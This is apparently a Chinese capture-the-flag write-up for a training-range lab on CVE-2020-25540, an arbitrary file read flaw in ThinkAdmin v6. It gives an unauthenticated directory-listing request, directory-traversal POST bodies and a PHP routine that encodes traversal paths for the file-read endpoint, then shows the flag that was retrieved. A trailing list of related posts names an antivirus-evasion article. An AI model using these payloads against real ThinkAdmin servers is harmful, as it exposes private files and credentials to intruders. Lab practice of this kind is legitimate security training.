春秋云镜 CVE-2020-25540

春秋云镜 CVE-2020-25540 Thinkadmin v6任意文件读取漏洞

靶标介绍

ThinkAdmin 6版本存在路径查找漏洞,可利用该漏洞通过GET请求编码参数任意读取远程服务器上的文件。

启动场景

漏洞利用

1、未授权列目录poc

读取网站根目录Payload: http://think.admin/ThinkAdmin/public/admin.html?s=admin/api.Update/node

POST:

rules=["/"]

rules=[".../.../.../"] (目录穿越)

2、任意文件读取

使用加密函数对文件名进行加密

php 复制代码
<?php
function encode($content)
{
    [$chars, $length] = ['', strlen($string = iconv('UTF-8', 'GBK//TRANSLIT', $content))];
    for ($i = 0; $i < $length; $i++) $chars .= str_pad(base_convert(ord($string[$i]), 10, 36), 2, 0, 0);
    return $chars;
}
$content="../../../flag";
echo encode($content);
?>

加密后的文件名为1a1a1b1a1a1b1a1a1b2u302p2v

请求http://eci-2ze3dysieeo26l90ip96.cloudeci1.ichunqiu.com/admin.html?s=admin/api.Update/get/encode/1a1a1b1a1a1b1a1a1b2u302p2v

base64解密得到文件内容

得到flag

flag{cef71ab7-c930-408d-8074-52350766063b}

相关推荐
风语者日志4 分钟前
CTFSHOW菜狗杯—WEB签到
前端·web安全·ctf·小白入门
q***87608 分钟前
Nginx 常用安全头
运维·nginx·安全
雨落秋垣19 分钟前
多系统 BBR 加速与网络安全综合方案
安全·web安全
m0_7381207224 分钟前
渗透测试——Kioptrix5靶机渗透测试详细教程
网络·python·安全·web安全·ssh
YJlio28 分钟前
SDelete 学习笔记(9.9):安全擦除原理、SSD 场景与企业合规实战
笔记·学习·安全
lingggggaaaa35 分钟前
免杀对抗——C2远控篇&PowerShell&C#&对抗AV-EDR&停用AMSI接口&阻断ETW跟踪&调用
c语言·开发语言·c++·学习·安全·c#·免杀对抗
量子炒饭大师44 分钟前
【一天一个计算机知识】—— 【编程百度】悬空指针
c语言·数据结构·c++·git·安全·github·dubbo
ZFJ_张福杰1 小时前
【技术深度】【安全】Remote Password Protection:一套密码永不上传的登录协议方案(含盲签 + Pairing + Crypto 模块)
安全·密码学·零信任·hsm·双线性映射·远程密码保护
xing.yu.CTF1 小时前
Hackmyvm靶场之Always渗透
web安全·渗透测试·横向移动·内网对抗
I***26151 小时前
MySQL 的mysql_secure_installation安全脚本执行过程介绍
数据库·mysql·安全